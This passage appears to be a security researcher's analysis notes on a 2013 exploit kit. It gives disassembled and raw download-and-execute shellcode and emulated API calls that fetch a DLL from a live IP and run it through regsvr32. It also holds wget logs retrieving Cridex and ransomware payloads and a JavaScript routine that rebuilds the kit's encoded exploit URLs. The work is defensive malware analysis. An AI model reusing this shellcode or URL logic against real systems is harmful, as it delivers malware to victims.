  344. 000000E3 40 inc eax
  345. 000000E4 284640 sub [esi+0x40],al ; math
  346. 000000E7 285A5D sub [edx+0x5d],bl ; math
  347. 000000EA 45 inc ebp
  348. 000000EB 44 inc esp
  349. 000000EC D7 xlatb
  350. 000000ED 7CAB jl 0x9a
  351. 000000EF 3E20EC ds and ah,ch
  352. 000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
  353. 000000F9 D7 xlatb
  354. 000000FA C3 ret
  355. 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
  356. 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
  357. 00000107 240C and al,0xc
  358. 00000109 2C4D sub al,0x4d ; math
  359. 0000010B 5A pop edx
  360. 0000010C 5B pop ebx
  361. 0000010D 4F dec edi
  362. 0000010E 6C insb
  363. 0000010F EF out dx,eax
  364. 00000110 2C0C sub al,0xc ; math
  365. 00000112 5A pop edx
  366. 00000113 5E pop esi
  367. 00000114 1A1B sbb bl,[ebx]
  368. 00000116 6C insb
  369. 00000117 EF out dx,eax
  370. 00000118 200C0508085B40 and [eax+0x405b0808],cl
  371. 0000011F 7B28 jpo 0x149
  372. 00000121 D028 shr byte [eax],1
  373. 00000123 287ED7 sub [esi-0x29],bh ; math
  374. 00000126 A3241BC079 mov [0x79c01b24],eax
  375. 0000012B E16C loope 0x199
  376. 0000012D EF out dx,eax
  377. 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
  378. 00000134 6C insb
  379. 00000135 EF out dx,eax
  380. 00000136 2D354C0644 sub eax,0x44064c35 ; math
  381. 0000013B 44 inc esp
  382. 0000013C 6C insb
  383. 0000013D EE out dx,al
  384. 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
  385. 00000144 182C6C sbb [esp+ebp*2],ch
  386. 00000147 A02C357969 mov al,[0x6979352c]
  387. 0000014C 284228 sub [edx+0x28],al ; math
  388. 0000014F 42 inc edx
  389. 00000150 7F7B jg 0x1cd
  390. 00000152 28427E sub [edx+0x7e],al ; math
  391. 00000155 D7 xlatb
  392. 00000156 AD lodsd
  393. 00000157 3C5D cmp al,0x5d
  394. 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
  395. 0000015E 7ED7 jng 0x137
  396. 00000160 42 inc edx
  397. 00000161 2CAB sub al,0xab ; math
  398. 00000163 2824C3 sub [ebx+eax*8],ah ; math
  399. 00000166 D7 xlatb
  400. 00000167 7B2C jpo 0x195
  401. 00000169 7EEB jng 0x156
  402. 0000016B AB stosd
  403. 0000016C C3 ret
  404. 0000016D 24C3 and al,0xc3
  405. 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
  406. 00000172 17 pop ss
  407. 00000173 A85D test al,0x5d
  408. 00000175 286FD2 sub [edi-0x2e],ch ; math
  409. 00000178 17 pop ss
  410. 00000179 A85D test al,0x5d
  411. 0000017B 2842EC sub [edx-0x14],al ; math
  412. 0000017E 42 inc edx
  413. 0000017F 28D7 sub bh,dl ; math
  414. 00000181 D6 salc
  415. 00000182 207EB4 and [esi-0x4c],bh
  416. 00000185 C0D7D6 rcl bh,0xd6
  417. 00000188 A6 cmpsb
  418. 00000189 D7 xlatb
  419. 0000018A 2666B0C4 es o16 mov al,0xc4
  420. 0000018E A2D6A12629 mov [0x2926a1d6],al
  421. 00000193 47 inc edi
  422. 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
  423. 0000019A 6E outsb
  424. 0000019B EE out dx,al
  425. 0000019C 1E push ds
  426. 0000019D 51 push ecx
  427. 0000019E 07 pop es
  428. 0000019F 324058 xor al,[eax+0x58] ; decryption
  429. 000001A2 5C pop esp
  430. 000001A3 5C pop esp
  431. 000001A4 125807 adc bl,[eax+0x7]
  432. 000001A7 07 pop es
  433. 000001A8 1E push ds
  434. 000001A9 1C19 sbb al,0x19
  435. 000001AB 06 push es
  436. 000001AC 1D1F1A061C sbb eax,0x1c061a1f
  437. 000001B1 1A1A sbb bl,[edx]
  438. 000001B3 06 push es
  439. 000001B4 1219 adc bl,[ecx]
  440. 000001B6 1810 sbb [eax],dl
  441. 000001B8 1810 sbb [eax],dl
  442. 000001BA 4E dec esi
  443. 000001BB 07 pop es
  444. 000001BC 5A pop edx
  445. 000001BD 47 inc edi
  446. 000001BE 45 inc ebp
  447. 000001BF 5D pop ebp
  448. 000001C0 44 inc esp
  449. 000001C1 07 pop es
  450. 000001C2 46 inc esi
  451. 000001C3 41 inc ecx
  452. 000001C4 5B pop ebx
  453. 000001C5 43 inc ebx
  454. 000001C6 58 pop eax
  455. 000001C7 07 pop es
  456. 000001C8 4A dec edx
  457. 000001C9 5D pop ebp
  458. 000001CA 41 inc ecx
  459. 000001CB 44 inc esp
  460. 000001CC 774B ja 0x219
  461. 000001CE 4D dec ebp
  462. 000001CF 5E pop esi
  463. 000001D0 5B pop ebx
  464. 000001D1 5A pop edx
  465. 000001D2 47 inc edi
  466. 000001D3 41 inc ecx
  467. 000001D4 06 push es
  468. 000001D5 46 inc esi
  469. 000001D6 40 inc eax
  470. 000001D7 58 pop eax
  471. 000001D8 17 pop ss
  472. 000001D9 58 pop eax
  473. 000001DA 4E dec esi
  474. 000001DB 5C pop esp
  475. 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
  476. 000001E2 1912 sbb [edx],edx
  477. 000001E4 124141 adc al,[ecx+0x41]
  478. 000001E7 191B sbb [ebx],ebx
  479. 000001E9 120E adc cl,[esi]
  480. 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
  481. 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
  482. 000001F4 1912 sbb [edx],edx
  483. 000001F6 12451A adc al,[ebp+0x1a]
  484. 000001F9 1B1B sbb ebx,[ebx]
  485. 000001FB 1212 adc dl,[edx]
  486. 000001FD 1B4319 sbb eax,[ebx+0x19]
  487. 00000200 1912 sbb [edx],edx
  488. 00000202 124319 adc al,[ebx+0x19]
  489. 00000205 1B19 sbb ebx,[ecx]
  490. 00000207 1212 adc dl,[edx]
  491. 00000209 42 inc edx
  492. 0000020A 47 inc edi
  493. 0000020B 19590E sbb [ecx+0xe],ebx
  494. 0000020E 19150E434045 sbb [dword 0x4540430e],edx
  495. 00000214 58 pop eax
  496. 00000215 155E0E155E adc eax,0x5e150e5e
  497. 0000021A 285A00 sub [edx+0x0],bl ; math
  498. 0000021D 28 db 0x28
  499.  
  500. // gathered blocks of API..
  501. blocks.. translation..
  502. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  503. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  504. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  505. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  506. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  507. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  508. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  509.  
  510.  
  511. // same one.... different code.. in url parts.. two time...
  512.  
  513. // raws..
  514. 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e5c1b15121846191912124141191b120e1b4d5f1a15125e4319191212451a1b1b12121b431919121243191b191212424719590e19150e43404558155e0e155e285a0028
  515.  
  516. // view...
  517. 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
  518. e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
  519. ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
  520. 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
  521. a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
  522. af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
  523. 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
  524. 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
  525. f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
  526. 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
  527. 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
  528. 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
  529. d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
  530. 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
  531. d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
  532. ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
  533. 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
  534. 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
  535. d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
  536. 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
  537. 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
  538. 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
  539. 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
  540. 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
  541. d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
  542. 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
  543. 58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
  544. 1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
  545. 07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
  546. 5a 5b 41 47 46 06 58 40 58 17 46 4e 15 19 40 12 Z[AGF.X@X.FN..@.
  547. 19 42 12 19 42 12 1b 1a 12 19 4e 0e 42 4d 15 19 .B..B.....N.BM..
  548. 42 12 1b 1b 12 1b 1a 12 19 44 12 19 4f 12 19 41 B........D..O..A
  549. 12 19 47 12 19 46 12 19 47 12 19 41 0e 5c 15 19 ..G..F..G..A.\..
  550. 43 0e 47 51 15 58 0e 42 40 15 41 28 28 00 C.GQ.X.B@.A((.
  551.  
  552. //disasm...
  553. 00000000 41 inc ecx
  554. 00000001 41 inc ecx
  555. 00000002 41 inc ecx
  556. 00000003 41 inc ecx
  557. 00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
  558. 00000008 EBFC jmp short 0x6 ; loop
  559. 0000000A 58 pop eax
  560. 0000000B 10C9 adc cl,cl
  561. 0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
  562. 00000013 FE db 0xfe
  563. 00000014 2830 sub [eax],dh ; math
  564. 00000016 E240 loop 0x58 ; loop
  565. 00000018 EBFA jmp short 0x14 ; loop
  566. 0000001A E805FFEBFF call dword 0xffebff24 ; call
  567. 0000001F FFCC dec esp
  568. 00000021 AD lodsd
  569. 00000022 1C5D sbb al,0x5d
  570. 00000024 77C1 ja 0xffffffe7
  571. 00000026 E81BA34C18 call dword 0x184ca346 ; call
  572. 0000002B 6868A3A324 push dword 0x24a3a368
  573. 00000030 3458 xor al,0x58 ; decryption
  574. 00000032 A37E205EF3 mov [0xf35e207e],eax
  575. 00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
  576. 0000003D 2B041B sub eax,[ebx+ebx] ; math
  577. 00000040 C6 db 0xc6
  578. 00000041 A9383DD7D7 test eax,0xd7d73d38
  579. 00000046 A39018686E mov [0x6e681890],eax
  580. 0000004B EB2E jmp short 0x7b ; loop
  581. 0000004D 11D3 adc ebx,edx
  582. 0000004F 5D pop ebp
  583. 00000050 1CAF sbb al,0xaf
  584. 00000052 AD lodsd
  585. 00000053 0C5D or al,0x5d
  586. 00000055 CC int3
  587. 00000056 C17964C3 sar dword [ecx+0x64],0xc3
  588. 0000005A 7E79 jng 0xd5
  589. 0000005C 5D pop ebp
  590. 0000005D A3A3141D5C mov [0x5c1d14a3],eax
  591. 00000062 2B507E sub edx,[eax+0x7e] ; math
  592. 00000065 DD5EA3 fstp qword [esi-0x5d]
  593. 00000068 2B08 sub ecx,[eax] ; math
  594. 0000006A 1BDD sbb ebx,ebp
  595. 0000006C 61 popad
  596. 0000006D E1D4 loope 0x43
  597. 0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
  598. 00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
  599. 0000007C E3E9 jecxz 0x67
  600. 0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
  601. 00000084 37 aaa
  602. 00000085 13CE adc ecx,esi
  603. 00000087 5D pop ebp
  604. 00000088 A3760C76F5 mov [0xf5760c76],eax
  605. 0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
  606. 00000093 A5 movsd
  607. 00000094 D7 xlatb
  608. 00000095 C40C7C les ecx,[esp+edi*2]
  609. 00000098 A3242BF0A3 mov [0xa3f02b24],eax
  610. 0000009D F5 cmc
  611. 0000009E A32CED2B76 mov [0x762bed2c],eax
  612. 000000A3 83EB71 sub ebx,byte +0x71 ; math
  613. 000000A6 7BC3 jpo 0x6b
  614. 000000A8 A385084055 mov [0x55400885],eax
  615. 000000AD A81B test al,0x1b
  616. 000000AF 242B and al,0x2b
  617. 000000B1 5C pop esp
  618. 000000B2 C3 ret
  619. 000000B3 BEA3DB2040 mov esi,0x4020dba3
  620. 000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
  621. 000000BE D7 xlatb
  622. 000000BF B0D7 mov al,0xd7
  623. 000000C1 D7 xlatb
  624. 000000C2 D1CA ror edx,1 ; bitwise cipher
  625. 000000C4 28C0 sub al,al ; math
  626. 000000C6 2828 sub [eax],ch ; math
  627. 000000C8 7028 jo 0xf2
  628. 000000CA 42 inc edx
  629. 000000CB 7840 js 0x10d
  630. 000000CD 6828D72828 push dword 0x2828d728
  631. 000000D2 AB stosd
  632. 000000D3 7831 js 0x106
  633. 000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
  634. 000000DA 76A3 jna 0x7f
  635. 000000DC AB stosd
  636. 000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
  637. 000000E3 40 inc eax
  638. 000000E4 284640 sub [esi+0x40],al ; math
  639. 000000E7 285A5D sub [edx+0x5d],bl ; math
  640. 000000EA 45 inc ebp
  641. 000000EB 44 inc esp
  642. 000000EC D7 xlatb
  643. 000000ED 7CAB jl 0x9a
  644. 000000EF 3E20EC ds and ah,ch
  645. 000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
  646. 000000F9 D7 xlatb
  647. 000000FA C3 ret
  648. 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
  649. 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
  650. 00000107 240C and al,0xc
  651. 00000109 2C4D sub al,0x4d ; math
  652. 0000010B 5A pop edx
  653. 0000010C 5B pop ebx
  654. 0000010D 4F dec edi
  655. 0000010E 6C insb
  656. 0000010F EF out dx,eax
  657. 00000110 2C0C sub al,0xc ; math
  658. 00000112 5A pop edx
  659. 00000113 5E pop esi
  660. 00000114 1A1B sbb bl,[ebx]
  661. 00000116 6C insb
  662. 00000117 EF out dx,eax
  663. 00000118 200C0508085B40 and [eax+0x405b0808],cl
  664. 0000011F 7B28 jpo 0x149
  665. 00000121 D028 shr byte [eax],1
  666. 00000123 287ED7 sub [esi-0x29],bh ; math
  667. 00000126 A3241BC079 mov [0x79c01b24],eax
  668. 0000012B E16C loope 0x199
  669. 0000012D EF out dx,eax
  670. 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
  671. 00000134 6C insb
  672. 00000135 EF out dx,eax
  673. 00000136 2D354C0644 sub eax,0x44064c35 ; math
  674. 0000013B 44 inc esp
  675. 0000013C 6C insb
  676. 0000013D EE out dx,al
  677. 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
  678. 00000144 182C6C sbb [esp+ebp*2],ch
  679. 00000147 A02C357969 mov al,[0x6979352c]
  680. 0000014C 284228 sub [edx+0x28],al ; math
  681. 0000014F 42 inc edx
  682. 00000150 7F7B jg 0x1cd
  683. 00000152 28427E sub [edx+0x7e],al ; math
  684. 00000155 D7 xlatb
  685. 00000156 AD lodsd
  686. 00000157 3C5D cmp al,0x5d
  687. 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
  688. 0000015E 7ED7 jng 0x137
  689. 00000160 42 inc edx
  690. 00000161 2CAB sub al,0xab ; math
  691. 00000163 2824C3 sub [ebx+eax*8],ah ; math
  692. 00000166 D7 xlatb
  693. 00000167 7B2C jpo 0x195
  694. 00000169 7EEB jng 0x156
  695. 0000016B AB stosd
  696. 0000016C C3 ret
  697. 0000016D 24C3 and al,0xc3
  698. 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
  699. 00000172 17 pop ss
  700. 00000173 A85D test al,0x5d
  701. 00000175 286FD2 sub [edi-0x2e],ch ; math
  702. 00000178 17 pop ss
  703. 00000179 A85D test al,0x5d
  704. 0000017B 2842EC sub [edx-0x14],al ; math
  705. 0000017E 42 inc edx
  706. 0000017F 28D7 sub bh,dl ; math
  707. 00000181 D6 salc
  708. 00000182 207EB4 and [esi-0x4c],bh
  709. 00000185 C0D7D6 rcl bh,0xd6
  710. 00000188 A6 cmpsb
  711. 00000189 D7 xlatb
  712. 0000018A 2666B0C4 es o16 mov al,0xc4
  713. 0000018E A2D6A12629 mov [0x2926a1d6],al
  714. 00000193 47 inc edi
  715. 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
  716. 0000019A 6E outsb
  717. 0000019B EE out dx,al
  718. 0000019C 1E push ds
  719. 0000019D 51 push ecx
  720. 0000019E 07 pop es
  721. 0000019F 324058 xor al,[eax+0x58] ; decryption
  722. 000001A2 5C pop esp
  723. 000001A3 5C pop esp
  724. 000001A4 125807 adc bl,[eax+0x7]
  725. 000001A7 07 pop es
  726. 000001A8 1E push ds
  727. 000001A9 1C19 sbb al,0x19
  728. 000001AB 06 push es
  729. 000001AC 1D1F1A061C sbb eax,0x1c061a1f
  730. 000001B1 1A1A sbb bl,[edx]
  731. 000001B3 06 push es
  732. 000001B4 1219 adc bl,[ecx]
  733. 000001B6 1810 sbb [eax],dl
  734. 000001B8 1810 sbb [eax],dl
  735. 000001BA 4E dec esi
  736. 000001BB 07 pop es
  737. 000001BC 5A pop edx
  738. 000001BD 47 inc edi
  739. 000001BE 45 inc ebp
  740. 000001BF 5D pop ebp
  741. 000001C0 44 inc esp
  742. 000001C1 07 pop es
  743. 000001C2 46 inc esi
  744. 000001C3 41 inc ecx
  745. 000001C4 5B pop ebx
  746. 000001C5 43 inc ebx
  747. 000001C6 58 pop eax
  748. 000001C7 07 pop es
  749. 000001C8 4A dec edx
  750. 000001C9 5D pop ebp
  751. 000001CA 41 inc ecx
  752. 000001CB 44 inc esp
  753. 000001CC 774B ja 0x219
  754. 000001CE 4D dec ebp
  755. 000001CF 5E pop esi
  756. 000001D0 5B pop ebx
  757. 000001D1 5A pop edx
  758. 000001D2 47 inc edi
  759. 000001D3 41 inc ecx
  760. 000001D4 06 push es
  761. 000001D5 46 inc esi
  762. 000001D6 40 inc eax
  763. 000001D7 58 pop eax
  764. 000001D8 17 pop ss
  765. 000001D9 58 pop eax
  766. 000001DA 4E dec esi
  767. 000001DB 5C pop esp
  768. 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
  769. 000001E2 1912 sbb [edx],edx
  770. 000001E4 124141 adc al,[ecx+0x41]
  771. 000001E7 191B sbb [ebx],ebx
  772. 000001E9 120E adc cl,[esi]
  773. 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
  774. 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
  775. 000001F4 1912 sbb [edx],edx
  776. 000001F6 12451A adc al,[ebp+0x1a]
  777. 000001F9 1B1B sbb ebx,[ebx]
  778. 000001FB 1212 adc dl,[edx]
  779. 000001FD 1B4319 sbb eax,[ebx+0x19]
  780. 00000200 1912 sbb [edx],edx
  781. 00000202 124319 adc al,[ebx+0x19]
  782. 00000205 1B19 sbb ebx,[ecx]
  783. 00000207 1212 adc dl,[edx]
  784. 00000209 42 inc edx
  785. 0000020A 47 inc edi
  786. 0000020B 19590E sbb [ecx+0xe],ebx
  787. 0000020E 19150E434045 sbb [dword 0x4540430e],edx
  788. 00000214 58 pop eax
  789. 00000215 155E0E155E adc eax,0x5e150e5e
  790. 0000021A 285A00 sub [edx+0x0],bl ; math
  791. 0000021D 28 db 0x28
  792.  
  793. //translating API..
  794.  
  795. blocks.... translation...
  796. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  797. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  798. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  799. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  800. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  801. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  802. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  803.  
  804. //============================
  805. // PAYLOADS GOES FIRST...
  806. //============================
  807.  
  808. // fetch these sh*ts...
  809.  
  810. --2013-02-18 15:08:46-- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
  811. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  812. :
  813. GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
  814. Host: 46.175.224.21:8080
  815. http request sent, awaiting response...
  816. :
  817. http/1.1 200 OK
  818. Server: nginx/1.0.10
  819. Date: Mon, 18 Feb 2013 06:08:39 GMT
  820. Content-Type: application/x-msdownload
  821. Connection: keep-alive
  822. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  823. Pragma: public
  824. Expires: Mon, 18 Feb 2013 06:08:39 GMT
  825. Cache-Control: must-revalidate, post-check=0, pre-check=0
  826. Cache-Control: private
  827. Content-Disposition: attachment; filename="about.exe"
  828. Content-Transfer-Encoding: binary
  829. Content-Length: 94208
  830. :
  831. 200 OK
  832. Length: 94208 (92K) [application/x-msdownload]
  833. Saving to: `./about.exe'
  834. 2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
  835.  
  836.  
  837. --2013-02-18 15:07:55-- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
  838. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  839. :
  840. GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
  841. Host: 46.175.224.21:8080
  842. http request sent, awaiting response...
  843. :
  844. h00p/1.1 200 OK
  845. Server: nginx/1.0.10
  846. Date: Mon, 18 Feb 2013 06:07:48 GMT
  847. Content-Type: application/x-msdownload
  848. Connection: keep-alive
  849. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  850. Pragma: public
  851. Expires: Mon, 18 Feb 2013 06:07:48 GMT
  852. Cache-Control: must-revalidate, post-check=0, pre-check=0
  853. Cache-Control: private
  854. Content-Disposition: attachment; filename="readme.exe"
  855. Content-Transfer-Encoding: binary
  856. Content-Length: 279040
  857. :
  858. 200 OK
  859. Length: 279040 (273K) [application/x-msdownload]
  860. Saving to: `./readme.exe'
  861. 2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
  862.  
  863.  
  864. //Payloads checks...Cridex & ransomware....
  865.  
  866. https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
  867. https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
  868.  
  869.  
  870.  
  871. =============CRACK LOGIC FOR PDF URL==================
  872.  
  873. function x(s){
  874. d = [];
  875. for (i = 0; i < s.length; i ++ ){
  876. k = (s.charCodeAt(i)).toString(33);
  877. d.push(k);
  878. }
  879. ;
  880. return d.join(":");
  881. }
  882.  
  883. var domain="h00p://46.175.224.21:8080";
  884. var pdf ="1k:1d:1f:1d:1g:1d:1f";
  885.  
  886. var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
  887. var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
  888. var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
  889. var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + "&gtaaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
  890.  
  891. var url1 = domain + string1 + pdf;
  892. var url2 = domain + string2 + pdf;
  893. var url3 = domain + string3 + pdf;
  894. var url4 = domain + string4 + pdf;
  895.  
  896. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  897.  
  898.  
  899. // output:
  900.  
  901. h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  902. h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  903. h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  904. h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  905.  
  906.  
  907. //=============CRACK LOGIC FOR SWF URL==================
